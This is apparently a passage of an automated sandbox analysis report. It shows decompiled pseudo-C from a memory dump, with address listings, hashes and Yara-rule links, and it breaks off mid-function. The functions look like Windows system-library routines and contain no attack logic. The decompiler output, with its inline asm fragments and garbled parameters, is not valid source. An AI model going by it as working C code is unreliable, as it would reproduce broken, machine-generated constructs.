                • Instruction ID: 05dd41b8ed577af8b5584a9be9a998602f2c90e770a24d944b3154d97e6e957b
                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                • Instruction Fuzzy Hash: 4B91AF712043429FE764CE29C840B1BBBE9AF84714F14892DFA99DB280E771EA04CB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 019151BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E019151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x19705f0);
				E018ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E019153CA(0);
						return E018ED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E018DF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E018B3690(1, _t117, 0x1871810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E018DAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L018B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E018DAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0191500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E018D9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                0x019151be
                0x019151c3
                0x019151c8
                0x019151cd
                0x019151d0
                0x019151d3
                0x019151d8
                0x019151db
                0x019151de
                0x019151e0
                0x019151e3
                0x019151e6
                0x019151e8
                0x01915342
                0x01915351
                0x01915356
                0x0191535a
                0x01915360
                0x01915363
                0x01915366
                0x01915369
                0x01915369
                0x0191536b
                0x0191536b
                0x01915370
                0x019153a3
                0x019153a4
                0x019153a6
                0x019153ab
                0x019153ab
                0x019153ae
                0x019153ae
                0x019153b5
                0x019153bf
                0x019153bf
                0x01915375
                0x01915396
                0x019153a0
                0x019153a0
                0x00000000
                0x01915396
                0x01915377
                0x01915379
                0x0191537f
                0x0191538c
                0x01915390
                0x00000000
                0x01915390
                0x019151ee
                0x019151f1
                0x01915301
                0x01915310
                0x01915315
                0x01915318
                0x0191531b
                0x01915320
                0x0191532e
                0x01915331
                0x00000000
                0x01915331
                0x01915328
                0x01915329
                0x00000000
                0x01915329
                0x019151fa
                0x01915235
                0x01915236
                0x01915239
                0x0191523f
                0x01915240
                0x01915241
                0x01915242
                0x01915246
                0x01915247
                0x0191524e
                0x01915251
                0x01915267
                0x01915269
                0x0191526e
                0x0191527d
                0x0191527e
                0x01915281
                0x01915282
                0x01915287
                0x01915288
                0x0191528a
                0x0191528f
                0x01915294
                0x00000000
                0x00000000
                0x0191529a
                0x0191529c
                0x0191529e
                0x0191529e
                0x019152a4
                0x019152b0
                0x00000000
                0x00000000
                0x019152ba
                0x019152bc
                0x019152bc
                0x019152d4
                0x019152d9
                0x019152dc
                0x019152e1
                0x00000000
                0x00000000
                0x019152e7
                0x019152f4
                0x00000000
                0x019152f4
                0x01915270
                0x00000000
                0x01915270
                0x019151fc
                0x019151fd
                0x01915202
                0x01915203
                0x01915205
                0x0191520a
                0x0191520f
                0x00000000
                0x00000000
                0x0191521b
                0x01915226
                0x0191522b
                0x0191521d
                0x0191521d
                0x01915222
                0x01915222
                0x0191522d
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: Legacy$UEFI
                • API String ID: 2994545307-634100481
                • Opcode ID: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                • Instruction ID: cb63c461c44a867cd0bd6994ccb18b0006c9f16bf93bd85cc6fb0ca09a0d456f
                • Opcode Fuzzy Hash: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                • Instruction Fuzzy Hash: F1517E71E00609DFEB25DFA8C880AADBBF8FF89700F16442DE609EB255D7719A41CB10
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018BB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E018BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x198d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E018B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01968CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E018D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E018DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E018DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E018B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01968F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E018DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1988628; // 0x0
								_v68 = _t77;
								_t78 =  *0x198862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1988628; // 0x0
							_t116 =  *0x198862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                0x018bb94c
                0x018bb956
                0x018bb95c
                0x018bb95e
                0x018bb964
                0x018bb969
                0x018bb96d
                0x018bb96d
                0x018bb970
                0x018bb974
                0x018bb97a
                0x018bbadf
                0x018bbadf
                0x018bbae2
                0x018bbae4
                0x018bbae6
                0x018bbaf0
                0x01902cb8
                0x018bbaf6
                0x018bbaf6
                0x018bbaf6
                0x018bbafd
                0x018bbb1f
                0x018bbb1f
                0x018bbaff
                0x018bbb00
                0x018bbb00
                0x018bbb03
                0x018bbb03
                0x018bbacb
                0x018bbacf
                0x018bbad0
                0x018bbad1
                0x018bbadc
                0x018bbadc
                0x018bb980
                0x018bb980
                0x018bb988
                0x018bb98b
                0x018bb98d
                0x018bb990
                0x018bb993
                0x018bb999
                0x018bb99b
                0x018bb9a1
                0x018bb9a5
                0x018bb9aa
                0x018bb9b0
                0x018bb9bb
                0x018bb9c0
                0x018bb9c3
                0x018bb9ca
                0x018bb9cc
                0x018bb9cf
                0x018bb9d3
                0x018bb9d7
                0x018bba94
                0x018bba94
                0x018bba98
                0x018bbaa3
                0x01902ccb
                0x018bbaa9
                0x018bbaa9
                0x018bbaa9
                0x018bbab1
                0x01902cd5
                0x01902cdd
                0x01902cdd
                0x018bbabb
                0x018bbabc
                0x018bbac2
                0x018bbac3
                0x018bbac3
                0x018bbac6
                0x00000000
                0x018bb9dd
                0x018bb9dd
                0x018bb9e7
                0x018bb9e7
                0x018bb9ec
                0x018bb9ec
                0x018bb9f1
                0x018bb9f5
                0x018bb9fa
                0x018bba00
                0x018bba0c
                0x018bba10
                0x018bba10
                0x018bba12
                0x018bba18
                0x00000000
                0x00000000
                0x018bbb26
                0x018bbb26
                0x018bba1e
                0x018bba1e
                0x018bba23
                0x018bba25
                0x018bba2c
                0x018bba30
                0x018bba35
                0x018bba35
                0x018bba41
                0x018bba46
                0x018bba4c
                0x018bba50
                0x018bba54
                0x018bba6a
                0x018bba6e
                0x018bba70
                0x018bba74
                0x018bba78
                0x018bba7a
                0x018bba7c
                0x018bba8e
                0x018bba90
                0x018bba92
                0x018bbb14
                0x018bbb14
                0x018bbb16
                0x018bbb16
                0x00000000
                0x018bba7c
                0x018bbb0a
                0x018bbb0d
                0x00000000
                0x00000000
                0x00000000
                0x018bbb0f

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018BB9A5
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID:
                • API String ID: 885266447-0
                • Opcode ID: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                • Instruction ID: 8db232d556e0cebf4fde681842c3f093cdae240f07d6bca3b571462d14bf3075
                • Opcode Fuzzy Hash: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                • Instruction Fuzzy Hash: A0515671A09341CFC721CF2CC4C092ABBE9BB88714F54896EEA95D7355D770EA44CB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0189B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                Download Yara Rule
                C-Code - Quality: 78%
                			E0189B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x196f7a8);
				E018ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E018ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E018DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E018DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L018EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E018DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E018DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E018DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E018DA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                0x0189b171
                0x0189b171
                0x0189b171
                0x0189b171
                0x0189b171
                0x0189b176
                0x0189b17b
                0x0189b180
                0x0189b186
                0x0189b18f
                0x0189b198
                0x0189b1a4
                0x0189b1aa
                0x018f4802
                0x018f4802
                0x018f4805
                0x018f480c
                0x018f480e
                0x0189b1d1
                0x0189b1d3
                0x0189b1de
                0x0189b1de
                0x018f4817
                0x018f481e
                0x018f4820
                0x018f4822
                0x018f4822
                0x018f4824
                0x018f4824
                0x018f482a
                0x00000000
                0x00000000
                0x018f4835
                0x018f483a
                0x018f483d
                0x018f483f
                0x018f4842
                0x018f4842
                0x018f4842
                0x018f4846
                0x018f484c
                0x018f484e
                0x018f4851
                0x018f4851
                0x018f4853
                0x018f4854
                0x018f4854
                0x018f4858
                0x018f485a
                0x018f485a
                0x018f485d
                0x018f485f
                0x018f4861
                0x018f4861
                0x018f4866
                0x018f486b
                0x018f486e
                0x018f4871
                0x018f4876
                0x018f4876
                0x018f4878
                0x018f487b
                0x018f4884
                0x018f4884
                0x00000000
                0x018f487d
                0x018f487d
                0x018f4882
                0x018f4889
                0x018f4889
                0x018f488f
                0x018f4891
                0x018f48e0
                0x018f48e2
                0x018f48e4
                0x018f48e4
                0x018f48e7
                0x018f48e7
                0x018f48ed
                0x018f48f4
                0x018f48f6
                0x018f4951
                0x018f4951
                0x018f4953
                0x018f4953
                0x018f4956
                0x018f4956
                0x018f4958
                0x018f4959
                0x018f4959
                0x018f495d
                0x018f495d
                0x018f495f
                0x018f495f
                0x018f4965
                0x018f4969
                0x018f49ba
                0x018f49ba
                0x018f49c1
                0x018f49c5
                0x018f49cc
                0x018f49d4
                0x018f49d7
                0x018f49da
                0x018f49e4
                0x018f49e5
                0x018f49f3
                0x018f4a02
                0x00000000
                0x018f4a02
                0x018f4972
                0x018f4974
                0x00000000
                0x00000000
                0x018f4976
                0x018f4979
                0x018f4982
                0x018f4983
                0x018f4984
                0x018f498b
                0x018f498d
                0x018f4991
                0x018f4993
                0x018f4999
                0x018f499d
                0x018f49a2
                0x018f49a2
                0x018f49a2
                0x018f4999
                0x018f49ac
                0x00000000
                0x018f49b3
                0x018f48f8
                0x018f48fe
                0x00000000
                0x00000000
                0x00000000
                0x018f48fe
                0x018f4895
                0x018f489c
                0x018f48ad
                0x018f48b2
                0x018f48b5
                0x018f48b7
                0x018f48ba
                0x018f48bc
                0x018f48c6
                0x018f48c6
                0x018f48cb
                0x018f48d1
                0x018f48d4
                0x018f48d8
                0x018f48d8
                0x00000000
                0x018f48d8
                0x018f48be
                0x018f48c0
                0x00000000
                0x00000000
                0x018f48c2
                0x00000000
                0x00000000
                0x00000000
                0x018f48c4
                0x00000000
                0x018f4882
                0x018f487b
                0x018f4904
                0x018f4906
                0x00000000
                0x00000000
                0x018f4908
                0x018f490e
                0x00000000
                0x00000000
                0x018f4910
                0x018f4917
                0x018f4917
                0x00000000
                0x018f4917
                0x0189b1ba
                0x018f47f9
                0x018f47fc
                0x00000000
                0x00000000
                0x00000000
                0x018f47fc
                0x0189b1c0
                0x0189b1c0
                0x0189b1c3
                0x0189b1cb
                0x00000000
                0x00000000
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: _vswprintf_s
                • String ID:
                • API String ID: 677850445-0
                • Opcode ID: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                • Instruction ID: ce5285865a2780fa3f1b0083e058a57bce231662fac3dd41bdef87bd2afef046
                • Opcode Fuzzy Hash: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                • Instruction Fuzzy Hash: B851E171E1025A8EDF35CF68C844BAEBBB0AF01714F1442AEDA59EB292D7704A45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018C2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 83%
                			E018C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200456, char _a1546912136) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t257;
				signed int _t259;
				intOrPtr _t261;
				signed int _t264;
				signed int _t271;
				signed int _t274;
				signed int _t282;
				intOrPtr _t288;
				signed int _t290;
				signed int _t292;
				void* _t293;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				intOrPtr* _t302;
				signed int _t303;
				signed int _t307;
				intOrPtr _t320;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				signed int _t342;
				signed int _t345;
				void* _t346;
				void* _t348;

				_t342 = _t345;
				_t346 = _t345 - 0x4c;
				_v8 =  *0x198d360 ^ _t342;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t336 = 0x198b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t288 = 0x48;
				_t317 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t329 = 0;
				_v37 = _t317;
				if(_v48 <= 0) {
					L16:
					_t45 = _t288 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t337 = 0xc0000106;
						goto L32;
					} else {
						_t336 = L018B4620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
						_v52 = _t336;
						__eflags = _t336;
						if(_t336 == 0) {
							_t337 = 0xc0000017;
							goto L32;
						} else {
							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
							_t50 = _t336 + 0x48; // 0x48
							_t331 = _t50;
							_t317 = _v32;
							 *((intOrPtr*)(_t336 + 0x3c)) = _t288;
							_t290 = 0;
							 *((short*)(_t336 + 0x30)) = _v48;
							__eflags = _t317;
							if(_t317 != 0) {
								 *(_t336 + 0x18) = _t331;
								__eflags = _t317 - 0x1988478;
								 *_t336 = ((0 | _t317 == 0x01988478) - 0x00000001 & 0xfffffffb) + 7;
								E018DF3E0(_t331,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
								_t317 = _v32;
								_t346 = _t346 + 0xc;
								_t290 = 1;
